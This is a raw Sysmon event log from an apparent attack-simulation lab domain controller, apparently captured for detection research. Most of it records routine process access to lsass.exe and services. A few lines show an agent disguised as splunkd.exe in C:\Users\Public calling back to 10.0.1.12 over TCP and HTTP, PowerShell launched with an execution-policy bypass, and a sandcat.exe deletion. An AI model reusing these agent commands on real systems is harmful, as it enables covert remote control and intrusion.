09:20:16.322{5EBD8912-8CBD-6151-0B00-00000000FD01}6402732C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052982Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.307{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD0-6151-2700-00000000FD01}3032C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052981Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.307{5EBD8912-8CBD-6151-0A00-00000000FD01}624292C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2700-00000000FD01}3032C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052980Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.310{5EBD8912-8CD0-6151-2700-00000000FD01}3032C:\Program Files\Amazon\XenTools\LiteAgent.exe1.0xenagentXENIFACEAmazon Inc.xenagent.exe"C:\Program Files\Amazon\XenTools\LiteAgent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001052979Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.307{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2500-00000000FD01}2936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001052978Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:16.291{5EBD8912-8CD0-6151-2600-00000000FD01}2944\Winsock2\CatalogChangeListener-b80-0C:\Windows\System32\spoolsv.exe 10341000x80000000000000001052977Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.291{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052976Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.291{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052975Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.276{5EBD8912-8CBD-6151-0A00-00000000FD01}624716C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052974Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.260{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052973Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.244{5EBD8912-8CBD-6151-0A00-00000000FD01}624312C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052972Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.232{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe10.0.14393.4651 (rs1_release.210911-1554)Spooler SubSystem AppMicrosoft® Windows® Operating SystemMicrosoft Corporationspoolsv.exeC:\Windows\System32\spoolsv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=0C3141349E7A2F8309DA835E23BE970F,SHA256=463992A62AC5BFFB8808DEAF8A58A8B52A7B0D3230D655CE98EF0B6A03C5A0B7,IMPHASH=EBCD1C1E4D3D83A9A5CC73CADF7A4B4D{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001052971Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.234{5EBD8912-8CC8-6151-2200-00000000FD01}26362660C:\Windows\system32\conhost.exe{5EBD8912-8CD0-6151-2500-00000000FD01}2936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052970Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.231{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD0-6151-2500-00000000FD01}2936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052969Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.230{5EBD8912-8CC8-6151-2100-00000000FD01}26282696C:\Users\Public\splunkd.exe{5EBD8912-8CD0-6151-2500-00000000FD01}2936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Users\Public\splunkd.exe+5c36e 154100x80000000000000001052968Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.230{5EBD8912-8CD0-6151-2500-00000000FD01}2936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ExecutionPolicy Bypass -C wvrvjqC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5EBD8912-8CC8-6151-2100-00000000FD01}2628C:\Users\Public\splunkd.exe"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp 10341000x80000000000000001052967Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.221{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052966Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.220{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052965Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.220{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052964Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.214{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 534500x80000000000000001052963Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.174{5EBD8912-8CC5-6151-2000-00000000FD01}2552C:\Users\Public\sandcat.exe 10341000x80000000000000001052962Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:11.505{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052961Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:11.505{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052960Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.849{5EBD8912-8CBD-6151-0B00-00000000FD01}6402732C:\Windows\system32\lsass.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052959Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.849{5EBD8912-8CBD-6151-0B00-00000000FD01}6402732C:\Windows\system32\lsass.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052958Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.849{5EBD8912-8CBD-6151-0B00-00000000FD01}6402732C:\Windows\system32\lsass.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052957Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.849{5EBD8912-8CBD-6151-0B00-00000000FD01}6402732C:\Windows\system32\lsass.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052956Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.833{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052955Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:09.833{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC9-6151-2300-00000000FD01}2752C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052954Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 